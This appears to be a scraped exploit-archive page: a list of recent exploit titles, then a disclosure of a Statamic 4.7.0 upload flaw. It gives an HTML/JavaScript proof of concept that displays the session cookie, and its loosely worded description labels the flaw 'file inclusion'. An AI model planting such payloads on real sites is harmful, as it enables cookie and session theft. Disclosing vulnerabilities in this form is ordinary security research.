
18 changes to exploits/shellcodes/ghdb Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution ABB FlowX v4.00 - Exposure of Sensitive Information TP-Link TL-WR740N - Authenticated Directory Transversal Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) Blackcat Cms v1.4 - Remote Code Execution (RCE) Blackcat Cms v1.4 - Stored XSS CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI) CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS) Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration) Online Piggery Management System v1.0 - unauthenticated file upload vulnerability phpfm v1.7.9 - Authentication type juggling PimpMyLog v1.7.14 - Improper access control PMB 7.4.6 - SQL Injection Statamic 4.7.0 - File-Inclusion Vaidya-Mitra 1.0 - Multiple SQLi
36 lines
No EOL
918 B
Text
36 lines
No EOL
918 B
Text
## Title: Statamic 4.7.0 - File-Inclusion
|
|
## Author: nu11secur1ty
|
|
## Date: 07.13.2023
|
|
## Vendor: https://statamic.com/
|
|
## Software: https://demo.statamic.com/
|
|
## Reference: https://portswigger.net/web-security/file-upload
|
|
|
|
|
|
## Description:
|
|
The statamic-4.7.0 suffers from file inclusion - file upload vulnerability.
|
|
The attacker can upload a malicious HTML file and can share the
|
|
malicious URL which uses the infected HTML file
|
|
to the other attackers in the network, they easily can look at the
|
|
token session key and can do very dangerous stuff.
|
|
|
|
|
|
## Staus: HIGH Vulnerability
|
|
|
|
[+]Exploit:
|
|
|
|
```js
|
|
<html>
|
|
<script>
|
|
alert(document.cookie);
|
|
</script>
|
|
</html>
|
|
```
|
|
|
|
## Reproduce:
|
|
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0)
|
|
|
|
## Proof and Exploit
|
|
[href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html)
|
|
|
|
## Time spend:
|
|
01:10:00 |